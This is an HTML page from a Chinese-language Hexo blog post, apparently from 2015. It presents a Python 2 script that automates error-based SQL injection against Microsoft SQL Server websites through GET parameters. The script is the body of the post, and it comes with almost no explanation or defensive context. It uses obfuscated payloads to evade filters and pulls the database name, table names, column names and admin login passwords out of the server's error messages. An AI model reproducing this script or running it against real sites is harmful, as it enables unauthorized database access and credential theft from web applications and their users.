<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>基于mssql的报错注入的脚本(get) | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="在进行mssql注入的时候，由于各种各样的原因，我们不能使用工具进行值得获取，那么可以自行编写脚本来获取值，python由于其良好的抓取网页的功能，被大家广泛使用。
对于get型的mssql的报错注入,代码如下：[python]
#! /usr/bin/env python
#coding=utf-8import reimport urllibimport urllib2
#从访问链接中获取报错信">
<meta property="og:type" content="article">
<meta property="og:title" content="基于mssql的报错注入的脚本(get)">
<meta property="og:url" content="http://yoursite.com/2015/04/07/e5-9f-ba-e4-ba-8emssql-e7-9a-84-e6-8a-a5-e9-94-99-e6-b3-a8-e5-85-a5-e7-9a-84-e8-84-9a-e6-9c-acget/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="在进行mssql注入的时候，由于各种各样的原因，我们不能使用工具进行值得获取，那么可以自行编写脚本来获取值，python由于其良好的抓取网页的功能，被大家广泛使用。
对于get型的mssql的报错注入,代码如下：[python]
#! /usr/bin/env python
#coding=utf-8import reimport urllibimport urllib2
#从访问链接中获取报错信">
<meta property="og:updated_time" content="2016-04-13T01:36:32.902Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="基于mssql的报错注入的脚本(get)">
<meta name="twitter:description" content="在进行mssql注入的时候，由于各种各样的原因，我们不能使用工具进行值得获取，那么可以自行编写脚本来获取值，python由于其良好的抓取网页的功能，被大家广泛使用。
对于get型的mssql的报错注入,代码如下：[python]
#! /usr/bin/env python
#coding=utf-8import reimport urllibimport urllib2
#从访问链接中获取报错信">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
  

</head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" results="0" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-e5-9f-ba-e4-ba-8emssql-e7-9a-84-e6-8a-a5-e9-94-99-e6-b3-a8-e5-85-a5-e7-9a-84-e8-84-9a-e6-9c-acget" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2015/04/07/e5-9f-ba-e4-ba-8emssql-e7-9a-84-e6-8a-a5-e9-94-99-e6-b3-a8-e5-85-a5-e7-9a-84-e8-84-9a-e6-9c-acget/" class="article-date">
  <time datetime="2015-04-07T13:02:13.000Z" itemprop="datePublished">2015-04-07</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/Python/">Python</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      基于mssql的报错注入的脚本(get)
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>在进行mssql注入的时候，由于各种各样的原因，我们不能使用工具进行值得获取，那么可以自行编写脚本来获取值，python由于其良好的抓取网页的功能，被大家广泛使用。</p>
<p>对于get型的mssql的报错注入,代码如下：<br>[python]</p>
<p>#! /usr/bin/<br>env python</p>
<p>#coding=utf-8<br>import re<br>import urllib<br>import urllib2</p>
<p>#从访问链接中获取报错信息</p>
<p>def getcontent(payload):  #获取网页内容<br>    url1=url+”AND (“+payload+”)=1 — “<br>    content = urllib.urlopen(url1).read()<br>    print content<br>    return  content</p>
<p>#从报错回显中提取数值<br>def getdata(content):<br>    patt = re.compile(“nvarchar.<em>?’(.</em>?)’.*?int”)<br>    data = patt.findall(content)<br>    if data:<br>        return data[0]<br>    else:<br>        return None</p>
<p>#获取当前数据库名<br>def getcurrentdb():<br>    payload = ‘db_name()’<br>    content = getcontent(payload)<br>    data = getdata(content)<br>    print “current_db: “+data<br>    return data<br>def gettablename(dbname,n):  #获取表名<br>    tablelist1=[]<br>    for i in range(n):<br>        payload = “select top 1 name %u0066rom “+dbname+”.dbo.sysobjects where xtype=’U’ and name  not in(select top “+str(i)+” name %u0066rom “+dbname+”.dbo.sysobjects where xtype=’U’ order by name) order by name”<br>        try:<br>            content = getcontent(payload)<br>            data = getdata(content)</p>
<pre><code>        #print data
        if data not in tablelist1:
            tablelist1.append(data)
        else:
            break
    except:
        continue
print tablelist1
print &apos;--------------------&apos;
</code></pre><p>def getcolumns(dbname,table,n):  #获取列名<br>    tablelist2=[]<br>    for i in range(n):<br>        payload=”Select top 1 name %u0066rom “+dbname+”.dbo.SysColumns Where id=Object_Id(‘“+table+”‘) and name not in (Select top “+str(i)+” Name %u0066rom “+dbname+”.dbo.SysColumns Where id=Object_Id(‘“+table+”‘) order by name) order by name”<br>        try:<br>            content = getcontent(payload)<br>            data = getdata(content)<br>            if  data not in tablelist2:<br>                tablelist2.append(data)<br>            else:<br>                break<br>        except:<br>            continue<br>    print table<br>    print tablelist2<br>    print ‘——————–’<br>def getvalue(dbname,table,column,n):  #获取各字段的值<br>    tablelist3=[]<br>    for i in range(n):<br>        payload=”select top 1 “+column+” %u0066rom “+table+” where “+column+” not in(select top  “+str(i)+” “+column+” %u0066rom “+table+” order by  id)order by id”<br>        try:<br>            content = getcontent(payload)<br>            data = getdata(content)<br>            if  data  not in tablelist3:<br>                tablelist3.append(data)<br>            else:<br>                break<br>        except:<br>            continue<br>    print column<br>    print tablelist3</p>
<p>if <strong>name</strong> == “<strong>main</strong>“:<br>    url=”<a href="http://www.example/pages/BulletinPage.aspx?id=21" target="_blank" rel="external">http://www.example/pages/BulletinPage.aspx?id=21</a>“<br>    global url<br>    db=getcurrentdb()<br>    gettablename(‘saa’,200)<br>    getcolumns(db,’Admin_Login’,50)<br>    getvalue(db,’Admin_Login’,’LoginPwd’,50)   #可自行选择注释，只留你需要的那个函数进行值得获取<br>[/python]</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2015/04/07/e5-9f-ba-e4-ba-8emssql-e7-9a-84-e6-8a-a5-e9-94-99-e6-b3-a8-e5-85-a5-e7-9a-84-e8-84-9a-e6-9c-acget/" data-id="cimy7541t0007l0gc2ccmjzin" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/python/">python</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2015/05/21/php5-5-e4-bd-bf-e7-94-a8bcrypt-e5-8a-a0-e5-af-86-e5-af-86-e7-a0-81/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          PHP5.5使用Bcrypt加密密码
        
      </div>
    </a>
  
  
    <a href="/2015/04/06/http-e8-af-b7-e6-b1-82-e5-a4-b4-e4-bf-a1-e6-81-af-e7-9a-84-e6-b3-a8-e5-85-a5-3/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">HTTP请求头信息的注入</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/PHP/">PHP</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Python/">Python</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/内网/">内网</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/工具/">工具</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/注入/">注入</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/漏洞利用/">漏洞利用</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/漏洞挖掘/">漏洞挖掘</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/python/">python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/工具/">工具</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/注入，注入技巧/">注入，注入技巧</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/python/" style="font-size: 20px;">python</a> <a href="/tags/工具/" style="font-size: 10px;">工具</a> <a href="/tags/注入，注入技巧/" style="font-size: 10px;">注入，注入技巧</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2016/03/">March 2016</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2015/11/">November 2015</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2015/09/">September 2015</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2015/07/">July 2015</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2015/06/">June 2015</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2015/05/">May 2015</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2015/04/">April 2015</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2016/03/11/e6-b5-85-e8-b0-88-e4-bc-81-e4-b8-9a-e7-bd-91-e7-bb-9c-e8-be-b9-e7-95-8c-3/">浅谈企业网络边界</a>
          </li>
        
          <li>
            <a href="/2016/03/02/e5-86-85-e7-bd-91-e6-b8-97-e9-80-8f-e4-b9-8bsocks5-e4-bb-a3-e7-90-86-ef-bc-88regeorgproxifier-e8-af-a6-e7-bb-86-e9-85-8d-e7-bd-ae-e8-af-b4-e6-98-8e-ef-bc-89/">内网渗透之socks5代理（reGeorg+proxifier详细配置说明）</a>
          </li>
        
          <li>
            <a href="/2015/11/10/e5-82-bb-e7-93-9c-e5-bc-8f-e9-80-9a-e7-94-a8-e9-92-93-e9-b1-bc-e5-b7-a5-e5-85-b7weeman1-5-greentree/">傻瓜式通用钓鱼工具Weeman1.5-GreenTree</a>
          </li>
        
          <li>
            <a href="/2015/09/29/e5-85-b3-e4-ba-8e-e6-9c-8d-e5-8a-a1-e5-99-a8-e7-9a-84host-e7-bb-91-e5-ae-9a-e7-9a-84-e4-b8-8d-e5-ae-89-e5-85-a8-e5-9b-a0-e7-b4-a0/">关于服务器的host绑定的不安全因素</a>
          </li>
        
          <li>
            <a href="/2015/07/15/mysql-e5-b8-83-e5-b0-94-e7-9b-b2-e6-b3-a8/">Mysql布尔盲注脚本</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2016 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>

  </div>
</body>
</html>